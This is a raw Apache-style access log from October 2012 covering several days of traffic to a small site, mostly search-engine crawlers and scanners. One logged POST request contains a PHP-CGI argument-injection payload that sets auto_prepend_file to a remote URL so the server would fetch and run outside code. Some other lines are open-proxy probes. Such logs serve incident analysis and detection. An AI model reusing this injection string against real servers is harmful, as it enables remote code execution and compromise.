190.120.231.35 - - [14/Oct/2012:04:21:54 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.120.231.35 - - [14/Oct/2012:04:21:54 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.120.231.35 - - [14/Oct/2012:04:21:54 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.120.231.35 - - [14/Oct/2012:04:21:54 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.120.231.35 - - [14/Oct/2012:04:21:54 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
157.55.32.93 - - [14/Oct/2012:05:16:55 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.93 - - [14/Oct/2012:05:28:30 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
94.102.51.246 - - [14/Oct/2012:07:21:36 +0200] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7ab745aa00143SSQJ_W_EFBF%5CC HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
66.249.76.40 - - [14/Oct/2012:07:31:22 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.40 - - [14/Oct/2012:07:31:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.76.103 - - [14/Oct/2012:08:01:04 +0200] "GET /robots.txt HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.103 - - [14/Oct/2012:08:01:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.56.92.163 - - [14/Oct/2012:08:03:22 +0200] "Connection: Keep-Alive" 400 329 "-" "-"
66.249.76.40 - - [14/Oct/2012:08:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.154 - - [14/Oct/2012:08:50:56 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.154 - - [14/Oct/2012:08:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.111 - - [14/Oct/2012:08:56:29 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.111 - - [14/Oct/2012:08:56:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.36 - - [14/Oct/2012:09:07:35 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.36 - - [14/Oct/2012:09:07:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.193 - - [14/Oct/2012:09:18:39 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.193 - - [14/Oct/2012:09:18:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
190.152.180.36 - - [14/Oct/2012:09:21:17 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
66.249.76.171 - - [14/Oct/2012:09:29:45 +0200] "GET /robots.txt HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.171 - - [14/Oct/2012:09:29:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.56.92.156 - - [14/Oct/2012:11:09:23 +0200] "t: www.dialyse-pforzheim.de" 400 329 "-" "-"
66.249.76.98 - - [14/Oct/2012:11:31:01 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.98 - - [14/Oct/2012:11:31:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
176.9.155.226 - - [14/Oct/2012:12:24:06 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [14/Oct/2012:12:24:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
88.198.24.173 - - [14/Oct/2012:15:11:10 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "ssearch_bot (sSearch Crawler; http://www.semantissimo.de)"
88.198.24.173 - - [14/Oct/2012:15:11:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "ssearch_bot (sSearch Crawler; http://www.semantissimo.de)"
66.249.76.40 - - [14/Oct/2012:16:29:00 +0200] "GET /seiten/optiplus_detail.php?det=lager HTTP/1.1" 404 336 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.25.93.230 - - [14/Oct/2012:16:37:21 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [14/Oct/2012:16:37:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
206.253.226.18 - - [14/Oct/2012:17:11:00 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
64.246.165.210 - - [14/Oct/2012:17:18:30 +0200] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.210 - - [14/Oct/2012:17:18:30 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/schraeg-senkrechtaufzuege.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
66.249.76.40 - - [14/Oct/2012:17:20:46 +0200] "GET /seiten/datenschutz.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
173.166.33.101 - - [14/Oct/2012:17:38:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
157.55.34.93 - - [14/Oct/2012:18:04:58 +0200] "t: www.dialyse-nagold.de" 400 329 "-" "-"
194.153.113.7 - - [14/Oct/2012:18:06:18 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
188.138.84.185 - - [14/Oct/2012:18:44:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla"
187.61.61.120 - - [14/Oct/2012:18:55:42 +0200] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://bhairahawa.biz/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://bhairahawa.biz/api.gif%20-n HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
178.77.126.55 - - [14/Oct/2012:19:25:53 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [14/Oct/2012:19:25:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
66.249.76.66 - - [14/Oct/2012:19:30:10 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.66 - - [14/Oct/2012:19:30:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.240.68.153 - - [14/Oct/2012:19:45:47 +0200] "GET http://myrepublica.com/news_images/7340.jpg HTTP/1.1" 404 327 "-" "webcollage/1.135a"
178.154.179.250 - - [14/Oct/2012:21:54:42 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:07 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
92.42.51.165 - - [14/Oct/2012:22:56:10 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
91.226.212.41 - - [15/Oct/2012:00:19:49 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
188.165.248.204 - - [15/Oct/2012:00:20:15 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.165.248.204 - - [15/Oct/2012:00:20:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
192.116.127.148 - - [15/Oct/2012:00:35:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:39 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:40 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:40 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
192.116.127.148 - - [15/Oct/2012:00:35:40 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
5.9.107.48 - - [15/Oct/2012:01:05:16 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.107.48 - - [15/Oct/2012:01:05:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
212.226.41.20 - - [15/Oct/2012:01:05:34 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
212.226.41.20 - - [15/Oct/2012:01:05:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
108.59.8.80 - - [15/Oct/2012:01:49:29 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
108.59.8.80 - - [15/Oct/2012:01:49:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
91.66.184.220 - - [15/Oct/2012:02:03:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
5.9.107.48 - - [15/Oct/2012:02:07:39 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.107.48 - - [15/Oct/2012:02:07:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [15/Oct/2012:02:08:22 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [15/Oct/2012:02:08:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.46.109.71 - - [15/Oct/2012:02:16:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.226.41.20 - - [15/Oct/2012:02:35:14 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
212.226.41.20 - - [15/Oct/2012:02:35:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
157.55.34.100 - - [15/Oct/2012:02:35:46 +0200] "Connection: Keep-Alive" 400 329 "-" "-"
5.9.249.29 - - [15/Oct/2012:02:42:41 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.249.29 - - [15/Oct/2012:02:42:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
91.226.212.41 - - [15/Oct/2012:02:50:06 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
85.178.95.147 - - [15/Oct/2012:03:37:20 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.178.95.147 - - [15/Oct/2012:03:37:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
91.226.212.41 - - [15/Oct/2012:03:49:34 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [15/Oct/2012:03:50:53 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
46.165.197.151 - - [15/Oct/2012:04:05:01 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.165.197.151 - - [15/Oct/2012:04:05:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.125.196 - - [15/Oct/2012:04:49:42 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.125.196 - - [15/Oct/2012:04:49:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
91.226.212.41 - - [15/Oct/2012:04:50:12 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
46.165.197.142 - - [15/Oct/2012:05:04:10 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.165.197.142 - - [15/Oct/2012:05:04:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
91.226.212.41 - - [15/Oct/2012:05:04:40 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
178.154.179.250 - - [15/Oct/2012:05:11:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
85.17.29.107 - - [15/Oct/2012:05:20:24 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
85.17.29.107 - - [15/Oct/2012:05:20:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
178.25.93.230 - - [15/Oct/2012:05:29:31 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [15/Oct/2012:05:29:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
95.96.224.110 - - [15/Oct/2012:05:34:18 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
95.96.224.110 - - [15/Oct/2012:05:34:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
82.128.253.46 - - [15/Oct/2012:06:07:43 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
82.128.253.46 - - [15/Oct/2012:06:07:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
94.102.51.246 - - [15/Oct/2012:06:22:23 +0200] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7ab745aa00143SSQJ_W_EFBF%5CN HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
178.25.93.230 - - [15/Oct/2012:06:30:28 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [15/Oct/2012:06:30:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
91.226.212.41 - - [15/Oct/2012:06:48:14 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [15/Oct/2012:06:50:17 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [15/Oct/2012:06:51:02 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [15/Oct/2012:07:43:12 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
178.154.179.250 - - [15/Oct/2012:07:55:16 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [15/Oct/2012:08:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.76.157 - - [15/Oct/2012:09:11:55 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.157 - - [15/Oct/2012:09:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
176.9.155.226 - - [15/Oct/2012:09:50:49 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [15/Oct/2012:09:50:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
217.69.133.30 - - [15/Oct/2012:09:55:56 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0)"
173.242.124.160 - - [15/Oct/2012:10:34:02 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.124.160 - - [15/Oct/2012:10:34:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
83.133.125.202 - - [15/Oct/2012:11:37:14 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/" "T-Online Browser"
66.249.76.157 - - [15/Oct/2012:13:18:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.240.68.152 - - [15/Oct/2012:14:23:35 +0200] "GET http://images4.byinter.net/img-32259.jpg HTTP/1.1" 404 324 "-" "webcollage/1.135a"
178.154.179.250 - - [15/Oct/2012:14:44:47 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [15/Oct/2012:16:08:52 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
83.133.125.202 - - [15/Oct/2012:17:16:15 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1"
178.154.179.250 - - [15/Oct/2012:19:07:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [15/Oct/2012:19:37:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [15/Oct/2012:21:23:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [15/Oct/2012:21:28:38 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
176.8.88.251 - - [15/Oct/2012:21:35:26 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.8.88.251 - - [15/Oct/2012:21:35:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
65.55.24.245 - - [15/Oct/2012:21:54:54 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.245 - - [15/Oct/2012:22:05:15 +0200] "GET /Heizoel-Berlin.html HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
87.147.214.164 - - [16/Oct/2012:01:35:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
87.147.214.164 - - [16/Oct/2012:01:35:03 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
176.9.155.226 - - [16/Oct/2012:02:02:24 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [16/Oct/2012:02:02:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.154.179.250 - - [16/Oct/2012:02:45:35 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
92.240.68.153 - - [16/Oct/2012:03:09:13 +0200] "GET http://www.permatyperubber.com/images/infbladders.jpg HTTP/1.1" 404 337 "-" "webcollage/1.135a"
194.153.113.35 - - [16/Oct/2012:03:56:25 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
194.153.113.35 - - [16/Oct/2012:03:56:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
178.154.179.250 - - [16/Oct/2012:04:18:37 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
46.137.66.0 - - [16/Oct/2012:08:03:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "InfohubbleBot"
92.240.68.153 - - [16/Oct/2012:10:26:40 +0200] "GET http://www.bloomberg.com/image/ip8HESEBhtdY.jpg HTTP/1.1" 404 331 "-" "webcollage/1.135a"
